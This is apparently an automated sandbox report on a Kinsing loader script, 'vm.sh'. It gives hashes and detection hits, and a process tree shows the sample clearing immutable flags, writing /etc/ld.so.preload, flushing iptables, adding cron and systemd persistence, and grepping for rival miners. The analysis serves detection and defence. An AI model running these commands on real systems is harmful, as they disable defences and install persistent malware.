Analysis
-
max time kernel
91s -
max time network
135s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
23/02/2025, 19:03
Static task
static1
Behavioral task
behavioral1
Sample
vm.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
vm.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
vm.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
vm.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
vm.sh
-
Size
15KB
-
MD5
773fe2ef07fd7a23e4726d9570465b7e
-
SHA1
179de0aed79976701debd15d1a4e3b401ce38a60
-
SHA256
0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8
-
SHA512
cfc7ac4c396ee0f467e98eaa3b101f68b863847a65872770835fae9a530a9663bda229b5d7f48a9f0b5547dd78ecdd433a96f956e25279db3e8f34650250c91b
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwR:trgXux7YJDj8OoJwR
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral4/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload vm.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1691 chmod 1700 chmod 1702 chmod 1707 chmod 1709 chmod 1715 chmod 1716 chmod 1689 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1717 vm.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 719 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1437 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1625 sed 1644 xargs 707 chattr 716 chattr 1606 xargs 1622 sed 1656 xargs 1667 xargs 1678 xargs 1523 xargs 1621 xargs 1624 xargs 1559 xargs 1592 sed 1615 xargs 1446 uname 1506 xargs 1591 xargs 1627 xargs 1683 xargs 1491 xargs 1516 xargs 1553 xargs 1594 xargs 1595 sed 1604 sed 1607 sed 1609 xargs 714 chattr 1501 xargs 1541 xargs 1547 xargs 1598 sed 1601 sed 1603 xargs 1613 sed 1496 xargs 1511 xargs 1528 xargs 1535 xargs 1616 sed 1618 xargs 1619 sed 1639 xargs 1470 xargs 1475 xargs 1480 xargs 1485 xargs 1597 xargs 1600 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.o4MrzH crontab File opened for modification /var/spool/cron/crontabs/tmp.p9Ng5T crontab File opened for modification /var/spool/cron/crontabs/tmp.wa90bq crontab File opened for modification /var/spool/cron/crontabs/tmp.IbPftb crontab File opened for modification /var/spool/cron/crontabs/tmp.ovnHDa crontab File opened for modification /var/spool/cron/crontabs/tmp.R4JMi4 crontab File opened for modification /var/spool/cron/crontabs/tmp.cMaPdl crontab File opened for modification /var/spool/cron/crontabs/tmp.1eXBEQ crontab File opened for modification /var/spool/cron/crontabs/tmp.UNQIvs crontab File opened for modification /var/spool/cron/crontabs/tmp.UxOG4f crontab File opened for modification /var/spool/cron/crontabs/tmp.N6QQH8 crontab File opened for modification /var/spool/cron/crontabs/tmp.yPgfvc crontab File opened for modification /var/spool/cron/crontabs/tmp.PDDVzA crontab File opened for modification /var/spool/cron/crontabs/tmp.Ex4FLa crontab File opened for modification /var/spool/cron/crontabs/tmp.j1FnPA crontab File opened for modification /var/spool/cron/crontabs/tmp.m6Zleg crontab File opened for modification /var/spool/cron/crontabs/tmp.m00WJr crontab File opened for modification /var/spool/cron/crontabs/tmp.tQq1Vv crontab File opened for modification /var/spool/cron/crontabs/tmp.7RWd9A crontab File opened for modification /var/spool/cron/crontabs/tmp.59tM1C crontab File opened for modification /var/spool/cron/crontabs/tmp.Z7weqa crontab File opened for modification /var/spool/cron/crontabs/tmp.FYz0DC crontab File opened for modification /var/spool/cron/crontabs/tmp.hQjnW0 crontab File opened for modification /var/spool/cron/crontabs/tmp.8HVJtS crontab File opened for modification /var/spool/cron/crontabs/tmp.BkFSZI crontab File opened for modification /var/spool/cron/crontabs/tmp.ujzOLO crontab File opened for modification /var/spool/cron/crontabs/tmp.li6Nac crontab File opened for modification /var/spool/cron/crontabs/tmp.2K0vca crontab File opened for modification /var/spool/cron/crontabs/tmp.0rwruY crontab File opened for modification /var/spool/cron/crontabs/tmp.ALYxBe crontab File opened for modification /var/spool/cron/crontabs/tmp.WuZvQr crontab File opened for modification /var/spool/cron/crontabs/tmp.OxFQ3A crontab File opened for modification /var/spool/cron/crontabs/tmp.l3HKxj crontab File opened for modification /var/spool/cron/crontabs/tmp.eNjwx0 crontab File opened for modification /var/spool/cron/crontabs/tmp.wxnJYY crontab File opened for modification /var/spool/cron/crontabs/tmp.O48KH5 crontab File opened for modification /var/spool/cron/crontabs/tmp.NvNJmC crontab File opened for modification /var/spool/cron/crontabs/tmp.AwD8lr crontab File opened for modification /var/spool/cron/crontabs/tmp.384xct crontab File opened for modification /var/spool/cron/crontabs/tmp.NZxmpr crontab File opened for modification /var/spool/cron/crontabs/tmp.AMIdpS crontab File opened for modification /var/spool/cron/crontabs/tmp.XG4N1s crontab File opened for modification /var/spool/cron/crontabs/tmp.VX2e7Z crontab File opened for modification /var/spool/cron/crontabs/tmp.uP0V5V crontab File opened for modification /var/spool/cron/crontabs/tmp.fHyrc2 crontab File opened for modification /var/spool/cron/crontabs/tmp.w6sgrT crontab File opened for modification /var/spool/cron/crontabs/tmp.NWNSm5 crontab File opened for modification /var/spool/cron/crontabs/tmp.qx6aQ3 crontab File opened for modification /var/spool/cron/crontabs/tmp.cN795E crontab File opened for modification /var/spool/cron/crontabs/tmp.iILOza crontab File opened for modification /var/spool/cron/crontabs/tmp.K88eGQ crontab File opened for modification /var/spool/cron/crontabs/tmp.CNLUdT crontab File opened for modification /var/spool/cron/crontabs/tmp.b6CMue crontab File opened for modification /var/spool/cron/crontabs/tmp.KkqIFQ crontab File opened for modification /var/spool/cron/crontabs/tmp.SW92ph crontab File opened for modification /var/spool/cron/crontabs/tmp.qt0dwB crontab File opened for modification /var/spool/cron/crontabs/tmp.Z4tbVh crontab File opened for modification /var/spool/cron/crontabs/tmp.rv6uFj crontab File opened for modification /var/spool/cron/crontabs/tmp.JJzOLb crontab File opened for modification /var/spool/cron/crontabs/tmp.U1nujv crontab File opened for modification /var/spool/cron/crontabs/tmp.tHtTI8 crontab File opened for modification /var/spool/cron/crontabs/tmp.TzQ4Xg crontab File opened for modification /var/spool/cron/crontabs/tmp.dsylZd crontab File opened for modification /var/spool/cron/crontabs/tmp.NTAgCL crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service vm.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1497 ps 1502 ps 1507 ps 1512 ps 1519 ps 1524 ps 1635 ps 1679 ps 1487 ps 1492 ps 1587 ps 1640 ps -
description ioc Process File opened for reading /proc/self/fd xargs File opened for reading /proc/361/status ps File opened for reading /proc/self/fd xargs File opened for reading /proc/333/cmdline ps File opened for reading /proc/362/status pkill File opened for reading /proc/1490/stat ps File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/1631/cmdline pkill File opened for reading /proc/17/cmdline pkill File opened for reading /proc/703/stat ps File opened for reading /proc/671/status pkill File opened for reading /proc/700/stat ps File opened for reading /proc/373/cmdline ps File opened for reading /proc/700/status ps File opened for reading /proc/73/status ps File opened for reading /proc/76/cmdline pkill File opened for reading /proc/119/status pkill File opened for reading /proc/1577/status pkill File opened for reading /proc/4/cmdline ps File opened for reading /proc/9/status pkill File opened for reading /proc/21/stat ps File opened for reading /proc/70/cmdline pkill File opened for reading /proc/667/cmdline ps File opened for reading /proc/424/stat ps File opened for reading /proc/119/cmdline pkill File opened for reading /proc/1/cmdline pkill File opened for reading /proc/706/cmdline pkill File opened for reading /proc/171/cmdline pkill File opened for reading /proc/74/cmdline ps File opened for reading /proc/1/stat ps File opened for reading /proc/4/status ps File opened for reading /proc/21/status pkill File opened for reading /proc/72/cmdline pkill File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/110/cmdline pkill File opened for reading /proc/filesystems sed File opened for reading /proc/2/status pkill File opened for reading /proc/76/cmdline pkill File opened for reading /proc/14/stat ps File opened for reading /proc/72/status pkill File opened for reading /proc/36/status pkill File opened for reading /proc/81/status pkill File opened for reading /proc/81/cmdline pkill File opened for reading /proc/22/status pkill File opened for reading /proc/70/stat ps File opened for reading /proc/5/stat ps File opened for reading /proc/9/status ps File opened for reading /proc/18/status pkill File opened for reading /proc/677/cmdline pkill File opened for reading /proc/6/status pkill File opened for reading /proc/8/cmdline pkill File opened for reading /proc/145/cmdline pkill File opened for reading /proc/75/cmdline ps File opened for reading /proc/75/status ps File opened for reading /proc/13/cmdline pkill File opened for reading /proc/73/cmdline pkill File opened for reading /proc/72/status pkill File opened for reading /proc/71/cmdline pkill File opened for reading /proc/10/status pkill File opened for reading /proc/6/status pkill File opened for reading /proc/13/cmdline pkill File opened for reading /proc/372/status pkill File opened for reading /proc/671/cmdline pkill File opened for reading /proc/73/cmdline pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1822 sed 1392 ls
Processes
-
/tmp/vm.sh/tmp/vm.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:703 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:707
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:712
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:714
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:716
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:719
-
-
/bin/grepgrep exe2⤵PID:728
-
-
/bin/lsls -latrh /proc/12⤵PID:727
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:733
-
-
/bin/grepgrep exe2⤵PID:738
-
-
/bin/lsls -latrh /proc/102⤵PID:737
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:740
-
-
/bin/grepgrep exe2⤵PID:744
-
-
/bin/lsls -latrh /proc/112⤵PID:743
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:747
-
-
/bin/grepgrep exe2⤵PID:750
-
-
/bin/lsls -latrh /proc/1102⤵PID:749
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:754
-
-
/bin/grepgrep exe2⤵PID:758
-
-
/bin/lsls -latrh /proc/1182⤵PID:757
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:760
-
-
/bin/grepgrep exe2⤵PID:764
-
-
/bin/lsls -latrh /proc/1192⤵PID:763
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:766
-
-
/bin/grepgrep exe2⤵PID:769
-
-
/bin/lsls -latrh /proc/122⤵PID:768
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:771
-
-
/bin/grepgrep exe2⤵PID:775
-
-
/bin/lsls -latrh /proc/132⤵PID:774
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:777
-
-
/bin/lsls -latrh /proc/142⤵PID:779
-
-
/bin/grepgrep exe2⤵PID:780
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:782
-
-
/bin/grepgrep exe2⤵PID:785
-
-
/bin/lsls -latrh /proc/1452⤵PID:784
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:787
-
-
/bin/lsls -latrh /proc/152⤵PID:789
-
-
/bin/grepgrep exe2⤵PID:790
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:792
-
-
/bin/lsls -latrh /proc/1522⤵PID:794
-
-
/bin/grepgrep exe2⤵PID:795
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:797
-
-
/bin/grepgrep exe2⤵PID:800
-
-
/bin/lsls -latrh /proc/162⤵PID:799
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:802
-
-
/bin/grepgrep exe2⤵PID:805
-
-
/bin/lsls -latrh /proc/1692⤵PID:804
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:807
-
-
/bin/grepgrep exe2⤵PID:810
-
-
/bin/lsls -latrh /proc/172⤵PID:809
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:812
-
-
/bin/grepgrep exe2⤵PID:815
-
-
/bin/lsls -latrh /proc/1712⤵PID:814
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:817
-
-
/bin/grepgrep exe2⤵PID:820
-
-
/bin/lsls -latrh /proc/182⤵PID:819
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:822
-
-
/bin/grepgrep exe2⤵PID:825
-
-
/bin/lsls -latrh /proc/192⤵PID:824
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:827
-
-
/bin/grepgrep exe2⤵PID:830
-
-
/bin/lsls -latrh /proc/22⤵PID:829
-
-
